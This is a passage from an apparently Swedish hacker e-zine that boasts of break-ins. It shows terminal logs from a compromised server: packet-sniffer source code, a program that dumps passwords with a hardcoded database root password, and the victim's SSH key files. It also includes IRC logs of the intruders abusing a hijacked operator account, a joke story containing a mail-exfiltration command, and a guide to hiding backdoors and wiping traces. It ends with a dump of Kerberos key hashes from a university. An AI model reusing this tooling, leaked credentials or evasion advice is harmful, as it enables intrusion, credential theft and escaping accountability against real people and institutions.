2025. drwxr-xr-x 2 root root 4096 Sep 22 17:05 system-files
2026. $ cd sniff
2027. $ ls -alrt
2028. total 28
2029. -rw-r--r-- 1 root root 2420 Dec 12 2001 sniff.c
2030. -rwxr-xr-x 1 root root 13481 Dec 12 2001 sniff
2031. drwxr-xr-x 2 root root 4096 Dec 12 2001 .
2032. drwxr-xr-x 5 root root 4096 Sep 22 15:55 ..
2033. $ cat sniff.c
2034. #include <stdio.h>
2035. #include <string.h>
2036. #include <errno.h>
2037. #include <unistd.h>
2038. #include <sys/socket.h>
2039. #include <sys/types.h>
2040. #include <linux/in.h>
2041. #include <linux/if_ether.h>
2042. #include <net/if.h>
2043. #include <sys/ioctl.h>
2044.  
2045. int main() {
2046. int sock, n, i;
2047. int q;
2048. char buffer[2048];
2049. struct ifreq ethreq;
2050. unsigned char *iphead, *ethhead;
2051.  
2052. if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP)))<0) {
2053. perror("socket");
2054. exit(1);
2055. }
2056.  
2057. strncpy(ethreq.ifr_name,"eth0",IFNAMSIZ);
2058. if (ioctl(sock,SIOCGIFFLAGS,&ethreq)==-1) {
2059. perror("ioctl");
2060. close(sock);
2061. exit(1);
2062. }
2063. ethreq.ifr_flags|=IFF_PROMISC;
2064. if (ioctl(sock,SIOCSIFFLAGS,&ethreq)==-1) {
2065. perror("ioctl");
2066. close(sock);
2067. exit(1);
2068. }
2069.  
2070. i = 0;
2071. while (1) {
2072. n = recvfrom(sock,buffer,2048,0,NULL,NULL);
2073. // printf("%d bytes read\n", n);
2074.  
2075. if (n<42) {
2076. perror("recvfrom():");
2077. printf("Incomplete packet (errno is %d)\n", errno);
2078. close(sock);
2079. exit(0);
2080. }
2081.  
2082.  
2083.  
2084. ethhead = buffer;
2085. iphead= buffer+14;
2086. // if ((iphead[20]<<8)+iphead[21] == 80) {
2087.  
2088. // printf("%04d ", n);
2089. // printf("%02x:%02x:%02x:%02x:%02x:%02x",
2090. // ethhead[0],ethhead[1],ethhead[2],
2091. // ethhead[3],ethhead[4],ethhead[5]);
2092. // printf(" > ");
2093. // printf("%02x:%02x:%02x:%02x:%02x:%02x",
2094. // ethhead[6],ethhead[7],ethhead[8],
2095. // ethhead[9],ethhead[10],ethhead[11]);
2096.  
2097. // printf(" ");
2098.  
2099. if (*iphead==0x45) {
2100. // if ((iphead[22]<<8)+iphead[23] == 80) {
2101.  
2102. if ((iphead[12] == 66 && iphead[13] == 70 && iphead[14] == 155 && iphead[15] == 126) || (iphead[16] == 66 && iphead[17] == 70 && iphead[18] == 155 && iphead[19] == 126)) {
2103. // if (iphead[16] == 194 && iphead[17] == 236 && iphead[18] == 124 && iphead[19] == 44 && (iphead[22]<<8)+iphead[23] == 80) {
2104.  
2105. printf("%03d.%03d.%03d.%03d:%05d",
2106. iphead[12],iphead[13],iphead[14],iphead[15],
2107. (iphead[20]<<8)+iphead[21]);
2108. printf(" > ");
2109. printf("%03d.%03d.%03d.%03d:%05d",
2110. iphead[16],iphead[17],iphead[18],iphead[19],
2111. (iphead[22]<<8)+iphead[23]);
2112.  
2113. printf("\n");
2114.  
2115. for (q=0;q<n;q++) {
2116. if (buffer[q] > '\32' && buffer[q] < '\170') {
2117. printf("%c", buffer[q]);
2118. } else {
2119. printf(".");
2120. }
2121. }
2122.  
2123. printf("\n");
2124. }
2125.  
2126. // }
2127. // }
2128.  
2129. // printf("\n");
2130.  
2131. }
2132.  
2133. }
2134.  
2135. }
2136.  
2137.  
2138. # /* no comment */
2139.  
2140.  
2141. $ cd ..
2142. $ ls
2143. irc2.10.3p3
2144. sniff
2145. system-files
2146. $ cd sys*
2147. $ ls -la
2148. total 28
2149. drwxr-xr-x 2 root root 4096 Sep 22 17:05 .
2150. drwxr-xr-x 5 root root 4096 Sep 22 15:55 ..
2151. -rwxr-xr-x 1 root root 13515 Sep 22 17:05 system-files
2152. -rw-r--r-- 1 root root 837 Sep 22 17:05 system-files.c
2153. $ cat *.c
2154.  
2155. #include <mysql/mysql.h>
2156. #include <stdio.h>
2157.  
2158. int main() {
2159. MYSQL SQLCONN;
2160. MYSQL_RES *SQLRES;
2161. MYSQL_ROW SQLROW;
2162. unsigned int num_fields;
2163. unsigned int num_rows;
2164. unsigned int i;
2165. char SQL_QUERY[512];
2166.  
2167. sprintf(SQL_QUERY, "SELECT * FROM tbl_passwd ORDER BY PASSWD_UID");
2168.  
2169. mysql_init(&SQLCONN);
2170. mysql_real_connect(&SQLCONN, "localhost", "root", "nattis", "_system", 0, NULL, 0);
2171. if (!mysql_real_query(&SQLCONN, SQL_QUERY, sizeof(SQL_QUERY))) {
2172. SQLRES = mysql_store_result(&SQLCONN);
2173. num_fields = mysql_num_fields(SQLRES);
2174. num_rows = mysql_num_rows(SQLRES);
2175. printf("Num fields: %d Num rows: %d\n", num_fields, num_rows);
2176. while (SQLROW = mysql_fetch_row(SQLRES)) {
2177. printf("%s:x:%s:%s:%s:%s:/bin/false\n", SQLROW[0], SQLROW[2], SQLROW[3], SQLROW[4], SQLROW[5]);
2178. }
2179. }
2180.  
2181. mysql_close(&SQLCONN);
2182. }
2183.  
2184.  
2185. #
2186. # Rootpass, rootpass.. H�r var det rootpass. N�n som vill ha rootpass?
2187. # Borde man inte vara mer f�rsiktig med sina c0d3z?
2188. #
2189.  
2190.  
2191. $ cd /home/spaced*
2192. $ cd .irc*
2193. $ ls -alrt
2194. total 409
2195. -rw-r--r-- 1 spacedmp spacedmp 867 Dec 27 1999 nickretreive.irc
2196. -rw-r--r-- 1 spacedmp spacedmp 1252 Jul 16 2000 hg.irc
2197. -rw-r--r-- 1 spacedmp spacedmp 881 Oct 9 2000 sd.oper
2198. -rw-r--r-- 1 spacedmp spacedmp 1379 Oct 11 2000 tgrep.irc
2199. -rw-r--r-- 1 spacedmp spacedmp 312 Oct 19 2000 mop.irc
2200. -rw-r--r-- 1 spacedmp spacedmp 476 Dec 27 2000 autopartuppsala.irc
2201. -rw-r--r-- 1 spacedmp spacedmp 1901 Jan 2 2001 tversion.irc
2202. -rw-r--r-- 1 spacedmp spacedmp 1348 Mar 17 2001 botfinder.irc
2203. -rw-r--r-- 1 spacedmp spacedmp 17827 Apr 7 2001 clients
2204. -rw-r--r-- 1 spacedmp spacedmp 45149 Apr 7 2001 clients.reply
2205. -rw------- 1 spacedmp spacedmp 34155 Apr 7 2001 botfinder.logfile
2206. -rw-r--r-- 1 spacedmp spacedmp 621 Jun 26 2001 wcs.irc
2207. -rw-r--r-- 1 spacedmp spacedmp 1234 Jul 14 2001 sd-operview.irc
2208. -rw-r--r-- 1 spacedmp spacedmp 5887 Oct 1 2001 sd.operit
2209. -rw-r--r-- 1 spacedmp spacedmp 802 Nov 5 2001 igrep.irc
2210. -rw-r--r-- 1 spacedmp spacedmp 38239 Dec 18 2001 sd.irc.old
2211. -rw-r--r-- 1 spacedmp spacedmp 245 Dec 22 2001 sd2.irc
2212. -rw-r--r-- 1 spacedmp spacedmp 63 Dec 31 2001 sd-menu
2213. -rw-r--r-- 1 spacedmp spacedmp 335 Jan 1 2002 tabcomplete.irc
2214. -rw-r--r-- 1 spacedmp spacedmp 840 Jan 4 2002 kgrep.irc.old
2215. -rw-r--r-- 1 spacedmp spacedmp 907 Jan 4 2002 kgrep.irc
2216. drwxr-xr-x 3 spacedmp spacedmp 1024 Jan 12 2002 bot
2217. -rw-r--r-- 1 spacedmp spacedmp 1411 Feb 14 2002 sd-checkclient.irc
2218. -rw-r--r-- 1 spacedmp spacedmp 66 Feb 14 2002 nisse.irc
2219. -rw-r--r-- 1 spacedmp spacedmp 39575 Mar 11 2002 sd.irc.backup
2220. drwxr-xr-x 2 spacedmp spacedmp 1024 Mar 11 2002 RCS
2221. -rw-r--r-- 1 spacedmp spacedmp 39929 Aug 6 14:01 sd.irc
2222. -rw-r--r-- 1 spacedmp spacedmp 39929 Aug 6 14:06 sd-new.irc
2223. -rw-r--r-- 1 spacedmp spacedmp 19920 Aug 10 22:46 sd.users.bak
2224. -rw-r--r-- 1 spacedmp spacedmp 19942 Aug 23 22:04 sd.users
2225. drwxr-xr-x 4 spacedmp spacedmp 1024 Aug 23 22:04 .
2226. drwxrwx--x 167 spacedmp spacedmp 75776 Sep 22 22:50 ..
2227. $ cd ..
2228. $ ls -ld *ssh*
2229. -rw------- 1 spacedmp spacedmp 978 Jun 17 2000 mysshkey
2230. -rw-r--r-- 1 spacedmp spacedmp 642 Jun 17 2000 mysshkey.pub
2231. -rw-r--r-- 1 spacedmp spacedmp 303319 Oct 14 1999 ssh-1.2.26-afs-kerberos.patch-1
2232. -rw-r--r-- 1 root root 201673 Mar 22 2000 ssh-1.2.27-afs-kerberos.patch-1
2233. -rw-r--r-- 1 spacedmp spacedmp 687 Jan 15 2002 sshd_config
2234. -rw-r--r-- 1 spacedmp spacedmp 1020 Sep 6 2000 sshstrul
2235.  
2236. $ /sbin/ifconfig -a
2237. eth0 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6
2238. inet addr:194.236.124.44 Bcast:194.236.124.63 Mask:255.255.255.224
2239. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
2240. RX packets:155739796 errors:0 dropped:0 overruns:0 frame:0
2241. TX packets:187641314 errors:0 dropped:0 overruns:969 carrier:0
2242. collisions:0 txqueuelen:100
2243. Interrupt:18
2244.  
2245. eth0:0 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6
2246. inet addr:194.236.124.45 Bcast:194.236.124.63 Mask:255.255.255.224
2247. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
2248. Interrupt:18
2249.  
2250. eth0:1 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6
2251. inet addr:194.236.124.46 Bcast:194.236.124.63 Mask:255.255.255.224
2252. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
2253. Interrupt:18
2254.  
2255. eth0:2 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6
2256. inet addr:194.236.124.47 Bcast:194.236.124.63 Mask:255.255.255.224
2257. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
2258. Interrupt:18
2259.  
2260. eth0:3 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6
2261. inet addr:194.236.124.38 Bcast:194.236.124.63 Mask:255.255.255.224
2262. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
2263. Interrupt:18
2264.  
2265. eth0:5 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6
2266. inet addr:194.236.124.42 Bcast:194.236.124.63 Mask:255.255.255.224
2267. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
2268. Interrupt:18
2269.  
2270. lo Link encap:Local Loopback
2271. inet addr:127.0.0.1 Mask:255.0.0.0
2272. UP LOOPBACK RUNNING MTU:16436 Metric:1
2273. RX packets:16447759 errors:0 dropped:0 overruns:0 frame:0
2274. TX packets:16447759 errors:0 dropped:0 overruns:0 carrier:0
2275. collisions:0 txqueuelen:0
2276. $ kill -9 $$
2277.  
2278.  
2279. #
2280. # Tenta imorgon, dags att samla energi.
2281. # Men vi kommer tillbaka, var s� s�ker p� det.
2282. #
2283.  
2284.  
2285. Tack och hej, leverpastej
2286.  
2287.  
2288.  
2289.  
2290. Tidigt - L�rdag.
2291.  
2292. K�ra Dagbok,
2293.  
2294. Idag hittade jag och mina v�nner p� mer bus med Spacedumps dator, f�rst s�
2295. �ndrade vi lite p� tv� av spacedumps hemsidor.. (www.linux.se och www.xmms.org)
2296. Sen s� hade vi tr�kigt och gick ut och lekte p� IRC med spacedumps
2297. IRC klient. Spacedump �r IRCop och har fet mackt �ver irken!
2298. Givetvis m�ste vi unders�ka detta genom att d�da folk vi f�raktar, folk som
2299. bara �r dumma i huvet och folk som mirkar i mats667's n�rhet
2300.  
2301. 07:50 �f� SignOff tlund: #linux.se (Local Kill by not_here_ (mail -s'all your base are belong to us' [email protected] ))
2302. 07:51 �f� SignOff sandyman: #linux.se (Killed (not_here_ (grattis p� 14�rsdagen - //linux.se)))
2303. 07:52 �f� SignOff alfonz: #linux.se (Local Kill by not_here_ (haha p� dig med))
2304. 07:56 �f� SignOff vader__: #linux.se (Kill line active: Abuse (No childpron on IRCNET, please))
2305. 07:57 �f� SignOff mrsaint: #linux.se (Local Kill by not_here_ (mysiga lilla farbror :)))
2306. 07:57 �f� SignOff granis: #linux.se (Local Kill by not_here_ (mysiga stora farbror :)))
2307. 08:06 �f� SignOff b9AcE: #linux.se (Kill line active: dissa inte homosexuella grupper -- patrik nilsson)
2308. 08:09 �f� SignOff alfonz: #linux.se (Local Kill by not_here_ (spacedump �r inte uttr�kad, spacedump �r �gd. dessutom g�r du
2309. intr�ng p� mitt internet.))
2310.  
2311. Kom ih�g - som vanligt s� �r det inte personen i loggarna som har tagit knarket.
2312. Hack the planet, Free Kevin...
2313.  
2314.  
2315. - AUH Republican Army
2316. +-------
2317. |
2318. +-------------------------------------------------------------------------+
2319. | En mycket fin logg som visar att du inte beh�ver de nyaste exploiten |
2320. | fr�n bugtraq f�r att hacka root p� en �nd� ganska stor server. |
2321. | H�r gick hackarna fr�n att inte ha n�got konto alls, till root p� |
2322. | servern som inneh�ll allt www material, luras inte av den korta loggen, |
2323. | Detta var n�got som tog n�gra dagar, Och vi har klippt bort ganska |
2324. | mycket (ett par megabyte f�r att vara exakt) f�r att undvika att |
2325. | tr�ka ut er. Det �r ju all *Action* man vill se, eller hur? |
2326. | |
2327. | Och Spacedump, jag hoppas du har s�krat upp din burk ;-P |
2328. +-------------------------------------------------------------------------+
2329. |
2330. +---+[AUH / Arga Unga Hackare ]--------+--------------------------------------+>
2331. |
2332. |
2333. +----------------------------------+
2334. |
2335. <---+-------------------------------------------------------------------------+>
2336.  
2337. En kall och m�r h�stnatt satt vi i v�ran h�gborg och hackade frenetiskt p�
2338. v�ra �verklockade pentium MMX -terminaler. B0NGr�ken l�g tung �ver redaktionen
2339. och en av v�ra skribenter satt ondskefullt skrattande i ett h�rn, knaprandes
2340. f�rglada piller. Rummet var fullt av 0nd hackarenergi och vi satt och slackade
2341. p� mIRKen i v�ntan p� n�got b�ttre.
2342. eftersom det varken gick n�got bra p� tv eller var n�gra vakna p� mIRKen
2343. s� besl�t vi oss f�r att hitta p� n�got diaboliskt, med ideerna uteblev..
2344. Det var en uttr�kad medlem som lite senare kom p� den genialiska ideen att
2345. posta massa inl�gg p� lunarstorm, med konton som inte var v�ra! muhahaha!
2346.  
2347. Vi hackar snabbt Lunarstorms databas-data d�r s�kerheten �r l�gre �n
2348. TC-redax efter ett tiotal B0NGar! h3h3h3h3
2349.  
2350. root@tc_hq>% telnet databas.lunarstorm.se
2351.  
2352. * V�lkjommen till v�ran databas data! *KjAmiZZar* *fniss*
2353.  
2354. login:bjarre
2355. password:******
2356.  
2357. # grep F14 userdatas.txt | mail hacker@tc_hq.regeringen.se
2358. #logout
2359.  
2360. whohoo! nu beh�ver vi bara massa datakraft f�r att knycka nyckeln
2361. till deras hemmagorda ASP och .NET krypteringssystem!
2362. Vi matar v�ra exalterade hj�rnor med mer datadroger och hackar
2363. under h�ga skratt igenom massa konton till vi hittar n�got med CPU
2364. att r�kna med! Vi hittar snabbt precis vad vi letar efter!! h4h4h4h4!!
2365. Vi anv�nder som alltid v�ran egenutvecklade tokoptimerade kodkn�ckare
2366. f�r dessa h�gprioriterade uppdrag av ren 0ndska.
2367.  
2368. root@tc_hq>% rlogin -u 3v1lh4X0rz motherbrain.utwente.nl
2369.  
2370.  
2371. Welcome to University of Twene Compter Network.
2372.  
2373.  
2374.  
2375. $ cd .\ \/.secret/
2376. $ ./ultimate_password_cracker
2377.  
2378. Welcome to The Ultimate Password Cracker.
2379.  
2380. >Connect all other computers on network
2381. *Connecting....100%*
2382. * you have now totally 1000THz of CPU *
2383.  
2384. >load all cpu power to password_cracker
2385. * 0.............100% *
2386.  
2387. >load file lunarstorm_passwd.rot13
2388. * 20000 passwords loaded. *
2389.  
2390. >crack all really fast
2391. * cracking speed 30% *
2392. * cracking speed 40% *
2393. ** SYSLOG MESSAGE: CPU temperature critical **
2394. * cracking speed 50% *
2395. * cracking speed 60% *
2396. ** SYSLOG MESSAGE: CPU temperature way out of line **
2397. * cracking speed 70% *
2398. * cracking speed 80% *
2399. ** SYSLOG MESSAGE: several CPU in network is on fire **
2400. * cracking speed 90% *
2401.  
2402. ** SYSLOG MESSAGE: Critical parts of computer are in flames **
2403.  
2404. LOST CARRIER
2405.  
2406. Otur att undertecknad var upptagen med att r�ka B0NG n�r varningar kom.
2407. Vi st�dar snyggt undan alla sp�r och l�tsas som inget har h�nt.
2408. Faktum �r att det inte har h�nt. P�st�r du annat s� f�rnekar vi allt.
2409.  
2410. Vi st�nger snabbt av str�mmen och drar till n�rmsta rejvfest f�r att
2411. ha vittnen p� att vi inte kan ha gjort det, vi hittar snabbt en m�nniska
2412. med allvarliga tidsst�rningar som kan g� i ed p� att vi var d�r flera i timmar.
2413. Han bj�d oss �ven p� mer knark. trevlig gosse.
2414.  
2415. - TC - din guide i cyberrymden
2416. <+----------------------------------------------------------------------------+>
2417.  
2418.  
2419.  
2420.  
2421.  
2422.  
2423. <+---[0x06: Liten guide till ett s�krare liv ]--------------------------------+>
2424.  
2425.  
2426. Sedan tidernas begynnelse har du f�tt l�ra dig att man ska vara f�rsiktig.
2427. �ven din mamma har f�rs�kt hinta dig om hur viktigt det �r att skydda sig.
2428. Detta g�ller �ven dina �ventyr p� internet.
2429.  
2430. Hur du skyddar dig fr�n att trubbel kan vi dela in i tre omr�den.
2431.  
2432. * Lokal S�kerhet
2433. * S�ker n�tkonnektivitet
2434. * Distant S�kerhet
2435.  
2436. Distant s�kerhet �r viktig f�r att du inte skall uppt�ckas och �ka dit.
2437. T�nk p� att g�mma alla bakd�rrar och verktyg s� de inte hittas av en slump.
2438. anv�nd n�gon av de olika kernelmodulbakd�rrarna f�r att g�mma kataloger,
2439. gl�m inte att g�mma dina processer och �ppna sockets!
2440.  
2441. S�ker n�tkonnektivitet �r viktig f�r att de inte skall kunna sp�ra dig
2442. n�r du v�l har blivit uppt�ckt.
2443. Anv�nd alltid bouncers, g�r _ingenting_ hemmifr�n.
2444. Kryptera all din trafik, bounca genom minst en burk som inte loggar.
2445.  
2446. Slutligen den lokala s�kerheten som �r viktig f�r att d�lja alla sp�r
2447. n�r dom v�l har sp�rat dig och tagit din burkar.
2448. Anv�nd kryptodisk! kryptera allt hemligt!
2449. t�nk p� dim .viminfo, d�r ser man vad du har editerat.
2450. $HISTFILE loggar allt du g�r, det m�ste du fixa.
2451. .ssh/known_hosts inneh�ller alla burkar du har loggat in p�. rensa!
2452. V�lj l�senord med h�g entropi.
2453. N�r du raderar filer, anv�nd http://wipe.sourceforge.net eller skriv �ver
2454. filen med dd och /dev/random innan du tar bort den.
2455.  
2456. En bra rutt ser ut n�got som det h�r:
2457.  
2458. * Elak Hackare
2459. * Lokala bnc's
2460. * Hackade s�kra bnc's
2461. * publika proxies
2462. * Oskyldigt offer
2463.  
2464.  
2465. I eventuellt f�rh�r kan det bli f�r�dande om din dator bevisar att du har n�gon
2466. last. Om polisen exempelvis hittar bevis f�r att du hittat p� porr i ~/.mplayer*
2467. kommer de med stor sannolikhet utnyttja detta mot dig. De kan d� f�rs�ka locka
2468. dig till att erk�nna ytterligare genom att locka med konto p� feta porrsiter
2469. eller erbjuda statistroller i svenska vuxenfilmer. �r du under arton kommer
2470. de dock bara att ber�tta f�r din mamma.
2471.  
2472.  
2473. De kommer aldrig att ta mig levande!
2474. Knackar det p� d�rren sv�ljer jag en floppy med bootsektorvirus!
2475.  
2476.  
2477. <+---[0x07: Mobbade barn med 0dayexploitz ]-----------------------------------+>
2478. |
2479. |
2480. +---------------------------------------------------+
2481. | Vi hade l�nge undrat vilka som rootade su.se |
2482. | n�r en person sn�llt nog mailade denna lilla |
2483. | loggen till oss, vi fick tom. alla 10k passwords! |
2484. +---------------------------------------------------+
2485.  
2486.  
2487. Nu �r det sagostund!
2488. Vi ska ber�tta sagan om n�r det blev s� h�r:
2489.  
2490. NYA L�SENORD.
2491. Efter ett intr�ng i ett av SU:s centrala datorsystem har vi tvingats
2492. byta ut alla l�senord. Detta p�verkar ditt login p� campus-datorerna
2493. s� v�l som din mail.
2494. Ditt nya l�senord finns att h�mta i informationsdisken (A-huset, plan
2495. 4) eller i v�r reception (B-huset, plan 2).
2496.  
2497. TAG MED DIG LEGITIMATION.
2498.  
2499. Informationsdisken har extra �ppet till kl. 18:00 t.o.m. torsdag p�
2500. grund av detta.
2501.  
2502.  
2503. Det var en g�ng ett stort, stort, universitet. Detta universitet l�g i den
2504. stora, stora, staden Stockholm, och hette s�ledes inget mindre �n Stockholms
2505. Universitet. En dag tyckte vi att det var l�mpligt med en liten, liten,
2506. utflykt till det stora, stora, universitetet.
2507. Vi h�lsade s�ledes p� i kojan bosatt av den lilla, lilla, gulliga, vovven
2508. Kerberos:
2509.  
2510.  
2511. uname -a;id
2512. FreeBSD kdc-master.su.se 4.0-RELEASE FreeBSD 4.0-RELEASE #0: Wed Mar 15 02:16:55 GMT 2000 [email protected]:/usr/src/sys/compile/GENERIC i386
2513. uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
2514. w;
2515. ps -auxwww;
2516. 1:32AM up 399 days, 10:08, 1 user, load averages: 0.00, 0.01, 0.23
2517. USER TTY FROM LOGIN@ IDLE WHAT
2518. root p0 - Mon02PM 6days bash
2519. USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
2520. root 91471 0.0 0.1 416 232 ?? R 1:32AM 0:00.00 ps -auxwww
2521. root 1 0.0 0.0 440 76 ?? ILs 16Sep01 0:00.44 /sbin/init --
2522. root 2 0.0 0.0 0 0 ?? DL 16Sep01 41:11.37 (pagedaemon)
2523. root 3 0.0 0.0 0 0 ?? DL 16Sep01 0:09.50 (vmdaemon)
2524. root 4 0.0 0.0 0 0 ?? DL 16Sep01 0:56.72 (bufdaemon)
2525. root 5 0.0 0.0 0 0 ?? DL 16Sep01 132:01.98 (syncer)
2526. root 23 0.0 0.0 208 0 ?? IWs - 0:00.00 adjkerntz -i
2527. root 74 0.0 0.2 1212 420 ?? S<s 16Sep01 37:41.51 ntpd -p /var/run/ntpd.pid
2528. root 93 0.0 0.1 1020 144 ?? Ss 16Sep01 0:36.94 inetd -wW
2529. root 95 0.0 0.2 928 340 ?? Ss 16Sep01 4:19.97 cron
2530. root 132 0.0 0.0 844 68 ?? Is 16Sep01 0:00.06 moused -p /dev/psm0 -t auto
2531. root 154 0.0 0.0 892 0 v1 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv1
2532. root 155 0.0 0.0 892 0 v2 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv2
2533. root 156 0.0 0.0 892 0 v3 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv3
2534. root 157 0.0 0.0 892 0 v4 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv4
2535. root 158 0.0 0.0 892 0 v5 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv5
2536. root 159 0.0 0.0 892 0 v6 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv6
2537. root 160 0.0 0.0 892 0 v7 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv7
2538. root 35320 0.0 0.2 1484 364 ?? Is 26Apr02 0:00.19 kpasswdd
2539. root 19130 0.0 0.2 872 344 ?? Ss 13May02 153:40.71 syslogd -s
2540. root 86260 0.0 0.1 1640 160 p1- I 4Jun02 0:00.05 bash
2541. root 43914 0.0 0.2 896 332 v0 Is+ 27Aug02 0:00.02 /usr/libexec/getty Pc ttyv0
2542. root 9686 0.0 2.1 130224 4124 ?? S 2Oct02 31:03.95 /usr/heimdal-0.4e/libexec/ipropd-master
2543. root 9690 0.0 3.0 11172 5844 p1- S 2Oct02 317:12.10 /usr/heimdal/libexec/kdc
2544. root 63940 0.0 0.7 1880 1316 ?? Is Mon02PM 0:00.07 telnetd -a user
2545. root 63941 0.0 0.1 484 268 p0 Is Mon02PM 0:00.05 -csh (csh)
2546. root 63944 0.0 0.6 1636 1116 p0 I+ Mon02PM 0:00.05 bash
2547. root 91466 0.0 0.1 608 228 ?? Ss 1:31AM 0:00.04 //bin/sh
2548. root 0 0.0 0.0 0 0 ?? DLs 16Sep01 0:23.46 (swapper)
2549. /usr/heimdal/sbin/kadmin -l dump -d ;
2550. [email protected] 1::16:e6d3fd80830ba449ba7f231346c7b3b5b3b61f4c6149a289:-::3:ba8c76c726010101:-::2:ba8c76c726010101:-::1:ba8c76c726010101:-::3:6da7867573ba205d:3/""::2:6da7867573ba205d:3/""::1:6da7867573ba205d:3/""::3:d5d3c270d6ece0f4:10/"su.se"::2:d5d3c270d6ece0f4:10/"su.se"::1:d5d3c270d6ece0f4:10/"su.se" 20020131100427:[email protected] - - - - - - 110 20020513153445:48341:0
2551. [email protected] 2::16:1aea89515df8bc92dc6479cbfd0852ec581c9140704f137a:-::3:ab4a9e73fe257a64:-::2:ab4a9e73fe257a64:-::1:ab4a9e73fe257a64:-::3:98a84f2fcd380246:3/""::2:98a84f2fcd380246:3/""::1:98a84f2fcd380246:3/""::3:19a44561a89b73a2:10/"su.se"::2:19a44561a89b73a2:10/"su.se"::1:19a44561a89b73a2:10/"su.se" 20020128101015:[email protected] 20020430061306:[email protected] - - - 86400 604800 126 20020513153445:50837:0
2552. [email protected] 2::16:0d31cd9d7a688ad5d66b024a13d08fb62951a2758fa2894f:-::3:5d40e60bb0926161:-::2:5d40e60bb0926161:-::1:5d40e60bb0926161:-::3:9b62622a2f1fd540:3/""::2:9b62622a2f1fd540:3/""::1:9b62622a2f1fd540:3/""::3:0b2998cbceb6bca2:10/"su.se"::2:0b2998cbceb6bca2:10/"su.se"::1:0b2998cbceb6bca2:10/"su.se" 20020510090359:[email protected] 20020514075757:[email protected] - - - - - 110 20020513153445:51954:1
2553. [email protected] 1::16:40ab6d2af1eae53bfeabd05d23d61c945e89f732895b8f08:-::3:d0c4e6b95276dc54:-::2:d0c4e6b95276dc54:-::1:d0c4e6b95276dc54:-::3:dfbcaddf1098ef4f:3/""::2:dfbcaddf1098ef4f:3/""::1:dfbcaddf1098ef4f:3/""::3:9183738cdfdfcd8c:10/"su.se"::2:9183738cdfdfcd8c:10/"su.se"::1:9183738cdfdfcd8c:10/"su.se" 20020201163724:[email protected] - - - - - - 110 20020513153445:53002:0
2554. [email protected] 1::16:e60d1a6b29d5cd616452464a7cc40be56297a479a7758cba:-::3:2fb6dc671967bc52:-::2:2fb6dc671967bc52:-::1:2fb6dc671967bc52:-::3:8501d90e011a97a2:3/""::2:8501d90e011a97a2:3/""::1:8501d90e011a97a2:3/""::3:869864a1d586ead0:10/"su.se"::2:869864a1d586ead0:10/"su.se"::1:869864a1d586ead0:10/"su.se" 20020325150349:[email protected] - - - - - - 110 20020513153445:54049:0
2555. [email protected] 1::16:ae8f8ca2912967abb357d332d5fb9e58a7f743151ad5f716:-::3:e5fbad31baf8d637:-::2:e5fbad31baf8d637:-::1:e5fbad31baf8d637:-::3:165e4cb38c29a24c:3/""::2:165e4cb38c29a24c:3/""::1:165e4cb38c29a24c:3/""::3:a89470916da7858a:10/"su.se"::2:a89470916da7858a:10/"su.se"::1:a89470916da7858a:10/"su.se" 20020325150606:[email protected] - - - - - - 110 20020513153445:55097:0
2556. [email protected] 1::16:190ed62ffb9ddaf268c2a14c046129584f071fc88a7abccb:-::3:73d989685e08bc98:-::2:73d989685e08bc98:-::1:73d989685e08bc98:-::3:5b34625bf8e3269d:3/""::2:5b34625bf8e3269d:3/""::1:5b34625bf8e3269d:3/""::3:d0a7c7f1d3cdf1f1:10/"su.se"::2:d0a7c7f1d3cdf1f1:10/"su.se"::1:d0a7c7f1d3cdf1f1:10/"su.se" 20020325150404:[email protected] - - - - - - 110 20020513153445:56169:0
2557. [email protected] 1::16:e58a62ba5b499b73255b62cd0dad4a5e9ef26b910208ea61:-::3:6208c22fbab958ba:-::2:6208c22fbab958ba:-::1:6208c22fbab958ba:-::3:d0dcfd10ba982a83:3/""::2:d0dcfd10ba982a83:3/""::1:d0dcfd10ba982a83:3/""::3:949ed0a4cec8a170:10/"su.se"::2:949ed0a4cec8a170:10/"su.se"::1:949ed0a4cec8a170:10/"su.se" 20010509140411:[email protected] - - - - - - 110 20020513153445:57221:0
2558. [email protected] 1::16:1c2a19cb0d260efec164e0a1c48c2a1349a7543e975149d9:-::3:e9a8f1c2807c1f0e:-::2:e9a8f1c2807c1f0e:-::1:e9a8f1c2807c1f0e:-::3:3b29e645ecc4f231:3/""::2:3b29e645ecc4f231:3/""::1:3b29e645ecc4f231:3/""::3:9dc89768918ad361:10/"su.se"::2:9dc89768918ad361:10/"su.se"::1:9dc89768918ad361:10/"su.se" 20020325150627:[email protected] - - - - - - 110 20020513153445:58284:0
2559. [email protected] 1::16:b53d5826077f7a86cb2ac48f513e7a31a2136b5e7afe3864:-::3:2f0e10ef01b6e313:-::2:2f0e10ef01b6e313:-::1:2f0e10ef01b6e313:-::3:01010101010101f1:3/""::2:01010101010101f1:3/""::1:01010101010101f1:3/""::3:8c8fefc76283d0b5:10/"su.se"::2:8c8fefc76283d0b5:10/"su.se"::1:8c8fefc76283d0b5:10/"su.se" 20020905075036:[email protected] - - - - 86400 604800 126 20020905075036:591707:0
2560. [email protected] 1::1:e3ba9ddf98163104:-::2:e3ba9ddf98163104:-::3:e3ba9ddf98163104:-::16:6bad762013c220853be0154958ec4acbf7cd5189153ee38f:- 20000818105529:kadmin/[email protected] 20000818105529:kadmin/[email protected] - - - 86400 604800 126 20020513153445:59135:0
